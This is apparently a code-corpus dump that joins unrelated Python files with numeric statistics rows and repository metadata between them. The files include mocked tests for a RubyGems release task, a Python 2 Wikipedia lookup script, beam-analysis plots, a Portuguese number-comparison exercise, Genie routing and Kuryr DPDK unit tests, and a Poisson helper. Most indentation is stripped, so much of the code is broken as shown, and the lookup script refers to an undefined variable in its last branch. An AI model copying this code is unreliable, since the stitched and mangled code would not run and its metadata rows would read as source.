call.open_changelog_md().write(('# 0.13.7\n'
'* Backwards compatible changes:\n'
' * Added `foo_v1`\n'
' * Updated `baz_v1`\n\n'
'...\n')),
call.open_changelog_md().__exit__(None, None, None),
call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['bundle', 'exec', 'rake', 'spec'],
cwd='/tmp/google-api-ruby-client'),
call.repo.commit('0.13.7', 'Alice', 'alice@test.com'),
call.repo.tag('0.13.7'),
call.repo.push(),
call.repo.push(tags=True),
call.check_output(['./script/package'],
cwd='/tmp/google-api-ruby-client'),
call.open('/home/test/.gem/credentials', 'w'),
call.open_credentials().__enter__(),
call.open_credentials().write('---\n:rubygems_api_key: api_key\n'),
call.open_credentials().__exit__(None, None, None),
call.chmod('/home/test/.gem/credentials', 0o600),
call.check_output(['gem', 'push', 'pkg/google-api-client-0.13.7.gem'],
cwd='/tmp/google-api-ruby-client')
]
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_no_commits_since_latest_tag(clone_from_github_mock):
repo_mock = Mock()
repo_mock.latest_tag.return_value = '1.0.0'
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(repo_mock, 'repo')
with pytest.raises(Exception) as excinfo:
google_api_ruby_client.release(
'/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
assert str(excinfo.value) == ('latest tag does not match the pattern'
r' "^0\.([0-9]+)\.([0-9]+)$": 1.0.0')
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.repo.latest_tag(),
]
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_different_authors_since_latest_tag(clone_from_github_mock):
repo_mock = Mock()
repo_mock.latest_tag.return_value = '0.13.6'
repo_mock.authors_since.return_value = ['alice@test.com', 'bob@test.com']
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(repo_mock, 'repo')
google_api_ruby_client.release(
'/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.repo.latest_tag(),
call.repo.authors_since('0.13.6')
]
@patch('tasks.google_api_ruby_client.os.chmod')
@patch('tasks.google_api_ruby_client.os.path.expanduser')
@patch('tasks.google_api_ruby_client.open', new_callable=mock_open)
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_force(clone_from_github_mock,
check_output_mock,
open_mock,
expanduser_mock,
chmod_mock):
repo_mock = Mock()
repo_mock.latest_tag.return_value = '0.13.6'
repo_mock.authors_since.return_value = ['alice@test.com', 'alice@test.com']
repo_mock.diff_name_status.return_value = [
('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
('generated/google/apis/baz_v1.rb', _git.Status.UPDATED),
]
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
check_output_mock.return_value = 'google-api-client (0.13.6)'
open_version_rb_mock = mock_open(
read_data=('...\n'
'module Google\n'
' module Apis\n'
' # Client library version\n'
' VERSION = \'0.13.6\'\n'
' ...\n'))
open_changelog_md_mock = mock_open(read_data='...\n')
open_credentials_mock = mock_open()
open_mock.side_effect = [
open_version_rb_mock.return_value,
open_version_rb_mock.return_value,
open_changelog_md_mock.return_value,
open_changelog_md_mock.return_value,
open_credentials_mock.return_value
]
expanduser_mock.side_effect = lambda x: '/home/test' + x[1:]
google_api_ruby_client.release(
'/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT, force=True)
# We don't bother verifying all calls in this case, since we only want to
# verify that the different authors check was passed.
assert repo_mock.mock_calls == [
call.latest_tag(),
call.authors_since('0.13.6'),
call.diff_name_status(rev='0.13.6'),
call.commit('0.13.7', 'Alice', 'alice@test.com'),
call.tag('0.13.7'),
call.push(),
call.push(tags=True),
]
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_latest_version_mismatch(clone_from_github_mock,
check_output_mock):
repo_mock = Mock()
repo_mock.latest_tag.return_value = '0.13.6'
repo_mock.authors_since.return_value = ['alice@test.com']
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
check_output_mock.return_value = 'google-api-client (1.0.0)'
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(check_output_mock, 'check_output')
manager.attach_mock(repo_mock, 'repo')
with pytest.raises(Exception) as excinfo:
google_api_ruby_client.release(
'/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
assert str(excinfo.value) == (
'latest tag does not match the latest package version on'
' RubyGems: 0.13.6 != 1.0.0')
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.repo.latest_tag(),
call.repo.authors_since('0.13.6'),
call.check_output(['gem', 'search', '-r', '^google-api-client$']),
]
| 46.950562
| 79
| 0.61389
| 2,599
| 20,893
| 4.595614
| 0.085417
| 0.061035
| 0.078366
| 0.114534
| 0.903969
| 0.900871
| 0.894675
| 0.891829
| 0.883707
| 0.879102
| 0
| 0.01296
| 0.253961
| 20,893
| 444
| 80
| 47.056306
| 0.75332
| 0.033217
| 0
| 0.807595
| 0
| 0
| 0.258584
| 0.1475
| 0
| 0
| 0
| 0
| 0.025316
| 1
| 0.020253
| false
| 0
| 0.010127
| 0
| 0.03038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3d26d3d6a3b64d3fbb4d9e690a0dd065c201e2b
| 2,033
|
py
|
Python
|
Python_Assistant/PyAssist/lookup.py
|
GeekyShiva/PyAssist
|
a8761cfcd8344771e7e1bfab469ed3e49f12adda
|
[
"MIT"
] | null | null | null |
Python_Assistant/PyAssist/lookup.py
|
GeekyShiva/PyAssist
|
a8761cfcd8344771e7e1bfab469ed3e49f12adda
|
[
"MIT"
] | null | null | null |
Python_Assistant/PyAssist/lookup.py
|
GeekyShiva/PyAssist
|
a8761cfcd8344771e7e1bfab469ed3e49f12adda
|
[
"MIT"
] | 1
|
2020-08-17T15:01:43.000Z
|
2020-08-17T15:01:43.000Z
|
def lookup(input):
import wikipedia
from findpic import imgLookup
from espeak import espeak
if input.startswith('look up'):
wikiLookUp = input[7:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print 'Results from wikipedia:'
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('who is '):
wikiLookUp = input[7:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('who was '):
wikiLookUp = input[8:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('what is '):
print input[7:8]
if input[8:10] == 'a ':
wikiLookUp = input[10:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input[8:11] == 'an ':
wikiLookUp = input[11:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
elif input[8:11] != 'an ' and input[8:10] != 'a ':
wikiLookUp = input[8:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('where is '):
wikiLookUp = input[9:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('how '):
print "Searched for: "+input
espeak.synth("Searched for: "+input)
imgLookup(wikiLookUp)
| 35.666667
| 58
| 0.598131
| 205
| 2,033
| 5.931707
| 0.170732
| 0.144737
| 0.241776
| 0.144737
| 0.770559
| 0.770559
| 0.743421
| 0.743421
| 0.743421
| 0.743421
| 0
| 0.015939
| 0.290212
| 2,033
| 56
| 59
| 36.303571
| 0.82675
| 0
| 0
| 0.615385
| 0
| 0
| 0.147565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057692
| null | null | 0.326923
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3dc047950348d212cb49f2f4d3d895a2f0cfa14
| 2,282
|
py
|
Python
|
feebb/test_sub.py
|
rbn920/feebb
|
b2ae340052122e43b812af1a36ae1128405f0220
|
[
"MIT"
] | null | null | null |
feebb/test_sub.py
|
rbn920/feebb
|
b2ae340052122e43b812af1a36ae1128405f0220
|
[
"MIT"
] | null | null | null |
feebb/test_sub.py
|
rbn920/feebb
|
b2ae340052122e43b812af1a36ae1128405f0220
|
[
"MIT"
] | 1
|
2021-02-09T17:22:16.000Z
|
2021-02-09T17:22:16.000Z
|
from feebb import *
import matplotlib.pyplot as plt
import itertools
# Beam 1
pre = Preprocessor()
pre.load_json('ex_json/test2.json')
elems = [Element(elem) for elem in pre.elements]
print(pre.supports)
beam = Beam(elems, pre.supports)
post = Postprocessor(beam, 10)
print(max(post.interp('moment')))
print(min(post.interp('moment')))
plt.plot(post.interp('moment'))
plt.show()
print(max(post.interp('shear')))
print(min(post.interp('shear')))
plt.plot(post.interp('shear'))
plt.show()
# Beam 1 submeshed
pre = Preprocessor()
pre.load_json('ex_json/test2.json')
mesh = 100
meshed = [Submesh(elem, mesh).submesh for elem in pre.elements]
meshed_flat = list(itertools.chain.from_iterable(meshed))
elems = [Element(elem) for elem in meshed_flat]
meshed_supports = submesh_supports(pre.supports, mesh)
beam = Beam(elems, meshed_supports)
post = Postprocessor(beam, 2)
print(max(post.interp('moment')))
print(min(post.interp('moment')))
plt.plot(post.interp('moment'))
plt.show()
print(max(post.interp('shear')))
print(min(post.interp('shear')))
plt.plot(post.interp('shear'))
plt.show()
# Beam 2 submeshed
pre = Preprocessor()
pre.load_json('ex_json/test.json')
mesh = 100
meshed = [Submesh(elem, mesh).submesh for elem in pre.elements]
meshed_flat = list(itertools.chain.from_iterable(meshed))
elems = [Element(elem) for elem in meshed_flat]
meshed_supports = submesh_supports(pre.supports, mesh)
beam = Beam(elems, meshed_supports)
post = Postprocessor(beam, 2)
print(max(post.interp('moment')))
print(min(post.interp('moment')))
plt.plot(post.interp('moment'))
plt.show()
print(max(post.interp('shear')))
print(min(post.interp('shear')))
plt.plot(post.interp('shear'))
plt.show()
# Beam 3 submeshed
pre = Preprocessor()
pre.load_json('ex_json/test3.json')
mesh = 100
meshed = [Submesh(elem, mesh).submesh for elem in pre.elements]
meshed_flat = list(itertools.chain.from_iterable(meshed))
elems = [Element(elem) for elem in meshed_flat]
meshed_supports = submesh_supports(pre.supports, mesh)
beam = Beam(elems, meshed_supports)
post = Postprocessor(beam, 2)
print(max(post.interp('moment')))
print(min(post.interp('moment')))
plt.plot(post.interp('moment'))
plt.show()
print(max(post.interp('shear')))
print(min(post.interp('shear')))
plt.plot(post.interp('shear'))
plt.show()
| 29.25641
| 63
| 0.741017
| 345
| 2,282
| 4.826087
| 0.136232
| 0.144144
| 0.115315
| 0.086486
| 0.917718
| 0.911111
| 0.896096
| 0.896096
| 0.841441
| 0.794595
| 0
| 0.010053
| 0.084575
| 2,282
| 77
| 64
| 29.636364
| 0.786979
| 0.024978
| 0
| 0.867647
| 0
| 0
| 0.091441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044118
| 0
| 0.044118
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a4c2ff26ec1ce6b388df35e605e4dad5c197ad4
| 846
|
py
|
Python
|
exercicios033.py
|
Capcode98/exercicios-PYTHON3-MUNDO1
|
c3d186dba25274a72ec347320e2376ac8f8f9b1f
|
[
"MIT"
] | null | null | null |
exercicios033.py
|
Capcode98/exercicios-PYTHON3-MUNDO1
|
c3d186dba25274a72ec347320e2376ac8f8f9b1f
|
[
"MIT"
] | null | null | null |
exercicios033.py
|
Capcode98/exercicios-PYTHON3-MUNDO1
|
c3d186dba25274a72ec347320e2376ac8f8f9b1f
|
[
"MIT"
] | null | null | null |
a = float(input('qual o primeiro numero? '))
b = float(input('qual o segundo numero? '))
c = float(input('qual o terceiro numero? '))
if a > b and a > c:
print('o numero {} é o maior de todos '.format(a))
if b > a and b > c:
print('o numero {} é o maior de todos '.format(b))
if c > b and c > a:
print('o numero {} é o maior de todos '.format(c))
if a < b and a < c:
print('o numero {} é o menor de todos '.format(a))
if b < a and b < c:
print('o numero {} é o menor de todos '.format(b))
if c < b and c < a:
print('o numero {} é o menor de todos '.format(c))
if a < b and a > c or a > b and a < c:
print('o numero {} é o do meio '.format(a))
if b < a and b > c or b > a and b < c:
print('o numero {} é o do meio '.format(b))
if c < b and c > a or c > b and c < a:
print('o numero {} é o do meio '.format(c))
| 40.285714
| 54
| 0.562648
| 180
| 846
| 2.644444
| 0.127778
| 0.113445
| 0.226891
| 0.245798
| 0.798319
| 0.798319
| 0.798319
| 0.798319
| 0.731092
| 0.659664
| 0
| 0
| 0.274232
| 846
| 21
| 55
| 40.285714
| 0.775244
| 0
| 0
| 0
| 0
| 0
| 0.390791
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.428571
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
434a3dc38dafb5e565acc8877b24b21366708a9d
| 3,120
|
py
|
Python
|
pkgs/conf-pkg/src/genie/libs/conf/routing/iosxe/tests/test_routing.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/conf-pkg/src/genie/libs/conf/routing/iosxe/tests/test_routing.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/conf-pkg/src/genie/libs/conf/routing/iosxe/tests/test_routing.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
#!/usr/bin/env python
# Python
import unittest
from unittest.mock import Mock
# Genie package
from genie.conf import Genie
from genie.tests.conf import TestCase
from genie.conf.base import Testbed, Device
# Genie Conf
from genie.libs.conf.routing import Routing
class test_routing(TestCase):
def test_full(self):
# For failures
self.maxDiff = None
# Set testbed
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxe')
# Create Routing object
routing = Routing()
dev1.add_feature(routing)
routing.device_attr[dev1].enabled = True
# Build config
cfgs = routing.build_config(apply=False)
# Check config strings built correctly
self.assertMultiLineEqual(
str(cfgs[dev1.name]),
'\n'.join([
'ip routing',
'ipv6 unicast routing',
]))
# Unconfigure
uncfgs = routing.build_unconfig(apply=False)
# Check config strings built correctly
self.assertMultiLineEqual(
str(uncfgs[dev1.name]),
'\n'.join([
'no ip routing',
'no ipv6 unicast routing',
]))
def test_ipv4(self):
# For failures
self.maxDiff = None
# Set testbed
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxe')
# Create Routing object
routing = Routing()
dev1.add_feature(routing)
routing.device_attr[dev1].enabled_ip_routing = True
# Build config
cfgs = routing.build_config(apply=False)
# Check config strings built correctly
self.assertMultiLineEqual(
str(cfgs[dev1.name]),
'\n'.join([
'ip routing',
]))
# Unconfigure
uncfgs = routing.build_unconfig(apply=False)
# Check config strings built correctly
self.assertMultiLineEqual(
str(uncfgs[dev1.name]),
'\n'.join([
'no ip routing',
]))
def test_ipv6(self):
# For failures
self.maxDiff = None
# Set testbed
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxe')
# Create Routing object
routing = Routing()
dev1.add_feature(routing)
routing.device_attr[dev1].enabled_ipv6_unicast_routing = True
# Build config
cfgs = routing.build_config(apply=False)
# Check config strings built correctly
self.assertMultiLineEqual(
str(cfgs[dev1.name]),
'\n'.join([
'ipv6 unicast routing',
]))
# Unconfigure
uncfgs = routing.build_unconfig(apply=False)
# Check config strings built correctly
self.assertMultiLineEqual(
str(uncfgs[dev1.name]),
'\n'.join([
'no ipv6 unicast routing',
]))
if __name__ == '__main__':
unittest.main()
| 25.16129
| 69
| 0.565385
| 316
| 3,120
| 5.490506
| 0.199367
| 0.072622
| 0.051873
| 0.072622
| 0.803458
| 0.803458
| 0.803458
| 0.803458
| 0.803458
| 0.803458
| 0
| 0.012083
| 0.336859
| 3,120
| 123
| 70
| 25.365854
| 0.826486
| 0.157051
| 0
| 0.779412
| 0
| 0
| 0.067562
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.044118
| false
| 0
| 0.088235
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43a329d01849829f2358d7be10147f55a9396f2b
| 8,574
|
py
|
Python
|
kuryr_kubernetes/tests/unit/controller/drivers/test_nested_dpdk.py
|
MaysaMacedo/kuryr-kubernetes-1
|
e4ba3896974e98dc46cb1afd9cbec42646250d72
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_nested_dpdk.py
|
MaysaMacedo/kuryr-kubernetes-1
|
e4ba3896974e98dc46cb1afd9cbec42646250d72
|
[
"Apache-2.0"
] | null | null | null |
kuryr_kubernetes/tests/unit/controller/drivers/test_nested_dpdk.py
|
MaysaMacedo/kuryr-kubernetes-1
|
e4ba3896974e98dc46cb1afd9cbec42646250d72
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2020 Intel Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from kuryr_kubernetes.controller.drivers import nested_dpdk_vif
from kuryr_kubernetes.tests import base as test_base
from kuryr_kubernetes.tests.unit import kuryr_fixtures as k_fix
from openstack import exceptions as o_exc
@ddt.ddt
class TestNestedDpdkVIFDriver(test_base.TestCase):
@mock.patch(
'kuryr_kubernetes.os_vif_util.neutron_to_osvif_vif_dpdk')
@mock.patch('kuryr_kubernetes.controller.drivers.utils.get_network_id')
def test_request_vif(self, m_get_network_id, m_to_vif):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
os_net = self.useFixture(k_fix.MockNetworkClient()).client
compute = self.useFixture(k_fix.MockComputeClient()).client
pod = mock.sentinel.pod
project_id = mock.sentinel.project_id
subnets = mock.sentinel.subnets
security_groups = mock.sentinel.security_groups
vm_id = mock.sentinel.parent_port_id
net_id = mock.sentinel.net_id
port_id = mock.sentinel.port_id
port = mock.sentinel.port
parent_port = mock.MagicMock()
vif = mock.Mock()
result = mock.Mock()
parent_port.device_id = vm_id
result.port_id = port_id
compute.create_server_interface.return_value = result
m_to_vif.return_value = vif
m_driver._get_parent_port.return_value = parent_port
m_get_network_id.return_value = net_id
os_net.get_port.return_value = port
self.assertEqual(vif, cls.request_vif(m_driver, pod, project_id,
subnets, security_groups))
m_driver._get_parent_port.assert_called_once_with(pod)
m_get_network_id.assert_called_once_with(subnets)
compute.create_server_interface.assert_called_once_with(
vm_id, net_id=net_id)
os_net.get_port.assert_called_once_with(result.port_id)
m_to_vif.assert_called_once_with(port, subnets, pod)
@mock.patch(
'kuryr_kubernetes.os_vif_util.neutron_to_osvif_vif_dpdk')
@mock.patch('kuryr_kubernetes.controller.drivers.utils.get_network_id')
def test_request_vif_parent_not_found(self, m_get_network_id, m_to_vif):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
os_net = self.useFixture(k_fix.MockNetworkClient()).client
compute = self.useFixture(k_fix.MockComputeClient()).client
pod = mock.sentinel.pod
project_id = mock.sentinel.project_id
subnets = mock.sentinel.subnets
security_groups = mock.sentinel.security_groups
vm_id = mock.sentinel.parent_port_id
net_id = mock.sentinel.net_id
port_id = mock.sentinel.port_id
port = mock.sentinel.port
parent_port = mock.MagicMock()
vif = mock.Mock()
result = mock.Mock()
parent_port.__getitem__.return_value = vm_id
result.port_id = port_id
compute.create_server_interface.return_value = result
m_to_vif.return_value = vif
m_driver._get_parent_port.side_effect = \
o_exc.SDKException
m_get_network_id.return_value = net_id
os_net.get_port.return_value = port
self.assertRaises(o_exc.SDKException, cls.request_vif,
m_driver, pod, project_id, subnets, security_groups)
m_driver._get_parent_port.assert_called_once_with(pod)
m_get_network_id.assert_not_called()
compute.create_server_interface.assert_not_called()
os_net.get_port.assert_not_called()
m_to_vif.assert_not_called()
@mock.patch(
'kuryr_kubernetes.os_vif_util.neutron_to_osvif_vif_dpdk')
@mock.patch('kuryr_kubernetes.controller.drivers.utils.get_network_id')
def test_request_vif_attach_failed(self, m_get_network_id, m_to_vif):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
os_net = self.useFixture(k_fix.MockNetworkClient()).client
compute = self.useFixture(k_fix.MockComputeClient()).client
pod = mock.sentinel.pod
project_id = mock.sentinel.project_id
subnets = mock.sentinel.subnets
security_groups = mock.sentinel.security_groups
vm_id = mock.sentinel.parent_port_id
net_id = mock.sentinel.net_id
port_id = mock.sentinel.port_id
port = mock.sentinel.port
parent_port = mock.MagicMock()
vif = mock.Mock()
result = mock.Mock()
parent_port.device_id = vm_id
result.port_id = port_id
m_to_vif.return_value = vif
m_driver._get_parent_port.return_value = parent_port
m_get_network_id.return_value = net_id
os_net.get_port.return_value = port
compute.create_server_interface.side_effect = o_exc.SDKException
self.assertRaises(o_exc.SDKException, cls.request_vif,
m_driver, pod, project_id, subnets, security_groups)
m_driver._get_parent_port.assert_called_once_with(pod)
m_get_network_id.assert_called_once_with(subnets)
compute.create_server_interface.assert_called_once_with(
vm_id, net_id=net_id)
os_net.get_port.assert_not_called()
m_to_vif.assert_not_called()
def test_release_vif(self):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
compute = self.useFixture(k_fix.MockComputeClient()).client
port_id = mock.sentinel.port_id
pod = mock.sentinel.pod
vif = mock.Mock()
vif.id = port_id
vm_id = mock.sentinel.vm_id
vm_port = mock.MagicMock()
vm_port.device_id = vm_id
m_driver._get_parent_port.return_value = vm_port
cls.release_vif(m_driver, pod, vif)
m_driver._get_parent_port.assert_called_once_with(pod)
compute.delete_server_interface.assert_called_once_with(
vif.id, server=vm_id)
def test_release_parent_not_found(self):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
compute = self.useFixture(k_fix.MockComputeClient()).client
pod = mock.sentinel.pod
vif = mock.Mock()
vif.id = mock.sentinel.vif_id
vm_id = mock.sentinel.parent_port_id
parent_port = mock.MagicMock()
parent_port.__getitem__.return_value = vm_id
m_driver._get_parent_port.side_effect = \
o_exc.SDKException
self.assertRaises(o_exc.SDKException, cls.release_vif,
m_driver, pod, vif)
m_driver._get_parent_port.assert_called_once_with(pod)
compute.delete_server_interface.assert_not_called()
def test_release_detach_failed(self):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
compute = self.useFixture(k_fix.MockComputeClient()).client
pod = mock.sentinel.pod
vif = mock.Mock()
vif.id = mock.sentinel.vif_id
vm_id = mock.sentinel.parent_port_id
parent_port = mock.MagicMock()
parent_port.device_id = vm_id
compute.delete_server_interface.side_effect = o_exc.SDKException
m_driver._get_parent_port.return_value = parent_port
self.assertRaises(o_exc.SDKException, cls.release_vif,
m_driver, pod, vif)
m_driver._get_parent_port.assert_called_once_with(pod)
compute.delete_server_interface.assert_called_once_with(
vif.id, server=vm_id)
@ddt.data((False), (True))
def test_activate_vif(self, active_value):
cls = nested_dpdk_vif.NestedDpdkPodVIFDriver
m_driver = mock.Mock(spec=cls)
pod = mock.sentinel.pod
vif = mock.Mock()
vif.active = active_value
cls.activate_vif(m_driver, pod, vif)
self.assertEqual(vif.active, True)
| 37.605263
| 78
| 0.691393
| 1,158
| 8,574
| 4.752159
| 0.131261
| 0.074141
| 0.045793
| 0.050881
| 0.815192
| 0.794294
| 0.781029
| 0.757223
| 0.751408
| 0.737779
| 0
| 0.001212
| 0.230464
| 8,574
| 227
| 79
| 37.770925
| 0.832828
| 0.070795
| 0
| 0.797619
| 0
| 0
| 0.041499
| 0.041499
| 0
| 0
| 0
| 0
| 0.160714
| 1
| 0.041667
| false
| 0
| 0.035714
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43aab7e1ab13649bf8b4a49237ed5a80f051fa41
| 198
|
py
|
Python
|
Trabalho/trab_SD/pubSub/pois.py
|
Digas-2/trab_sd
|
7d9f62143e7a0a844e9a5e4d19655ef0f61b7b36
|
[
"Apache-2.0"
] | null | null | null |
Trabalho/trab_SD/pubSub/pois.py
|
Digas-2/trab_sd
|
7d9f62143e7a0a844e9a5e4d19655ef0f61b7b36
|
[
"Apache-2.0"
] | null | null | null |
Trabalho/trab_SD/pubSub/pois.py
|
Digas-2/trab_sd
|
7d9f62143e7a0a844e9a5e4d19655ef0f61b7b36
|
[
"Apache-2.0"
] | null | null | null |
import math
import random
def nextTime(rateParameter):
return -math.log(1.0 - random.random()) / rateParameter
def PoisTime(n_events,time_interval):
return nextTime(n_events/time_interval)
| 24.75
| 59
| 0.772727
| 27
| 198
| 5.518519
| 0.555556
| 0.09396
| 0.147651
| 0.255034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011561
| 0.126263
| 198
| 8
| 60
| 24.75
| 0.849711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
43b4a3db5773090f9e78a700e8eccbfcdb3d6463
| 25,860
|
py
|
Python
|
ec2_compare/internal/bare_metal/true.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/bare_metal/true.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/bare_metal/true.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Automatically generated
# pylint: disable=all
